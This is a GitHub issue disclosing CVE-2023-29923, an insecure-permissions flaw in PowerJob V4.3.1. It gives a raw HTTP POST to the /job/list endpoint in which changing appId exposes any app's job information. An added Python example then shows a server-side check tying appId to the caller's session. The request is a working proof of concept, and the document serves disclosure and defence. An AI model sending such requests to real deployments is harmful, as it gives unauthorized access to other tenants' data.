CVE-2023-29923: I want to report an unauthorized access vulnerability · Issue #587 · PowerJob/PowerJob
PowerJob V4.3.1 is vulnerable to Insecure Permissions via the list job interface.
Describe the bug
Hello team, I want to report an unauthorized access vulnerability.
Just edit the id and send the packet:
POST /job/list HTTP/1.1
Host: test.cn:7700
Content-Length: 35
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.69
Content-Type: application/json;charset=UTF-8
Origin: http://test.cn:7700
Referer: http://test.cn:7700/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

{"appId":1,"index":0,"pageSize":10}
Now you can view information of any app.
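Added example, not part of the original report and not PowerJob's code or its fix: a server-side check for the `/job/list` request above that refuses to trust the client-supplied `appId` and compares it with the app ids bound to the caller's session. The session model and the names `authorize_job_list`, `status_for` and `AuthzError` are hypothetical.

```python
import json

# Constructed sample: the JSON body from the request in the report.
PAGE_BODY = '{"appId":1,"index":0,"pageSize":10}'

class AuthzError(Exception):
    def __init__(self, status, reason):
        super().__init__(reason)
        self.status = status

def _no_duplicate_keys(pairs):
    # json.loads silently keeps the last duplicate key; reject duplicates so
    # this check and the downstream handler cannot read different appIds.
    keys = [k for k, _ in pairs]
    if len(keys) != len(set(keys)):
        raise ValueError("duplicate key in JSON body")
    return dict(pairs)

def authorize_job_list(session_app_ids, raw_body):
    """Return the appId the caller may list, or raise AuthzError.

    session_app_ids: app ids bound to the session at login (hypothetical
    model, an assumption); None means the request carried no session.
    """
    if session_app_ids is None:
        raise AuthzError(401, "no authenticated session")
    try:
        body = json.loads(raw_body, object_pairs_hook=_no_duplicate_keys)
    except ValueError as exc:  # also covers json.JSONDecodeError
        raise AuthzError(400, f"bad request body: {exc}") from exc
    app_id = body.get("appId") if isinstance(body, dict) else None
    # bool is an int subclass in Python, and True == 1, so exclude it.
    if isinstance(app_id, bool) or not isinstance(app_id, int):
        raise AuthzError(400, "appId must be an integer")
    if app_id not in session_app_ids:
        raise AuthzError(403, "appId is not bound to this session")
    return app_id

def status_for(session_app_ids, raw_body):
    """HTTP status the endpoint would answer with under this check."""
    try:
        authorize_job_list(session_app_ids, raw_body)
        return 200
    except AuthzError as exc:
        return exc.status
```

With this check in front of the handler, the reported request is answered with 401 when it carries no session and with 403 when the session belongs to a different app.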